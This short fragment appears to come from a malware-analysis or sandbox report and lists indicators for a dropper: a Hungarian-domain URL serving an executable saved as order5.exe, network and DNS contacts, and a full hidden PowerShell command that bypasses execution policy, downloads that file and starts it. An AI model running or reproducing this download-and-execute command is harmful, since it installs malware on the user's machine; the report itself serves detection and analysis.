Technical Information
- https://www.gyokeritato.hu/agrooter/rfq/oetadq.exe as order5.exe
- 'gy###ritato.hu':443
- DNS ASK gy###ritato.hu
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile('https://www.gyokeritato.hu/agrooter/RFQ/Oetadq.exe','Order5.exe');Start-Process '...' (with hidden window)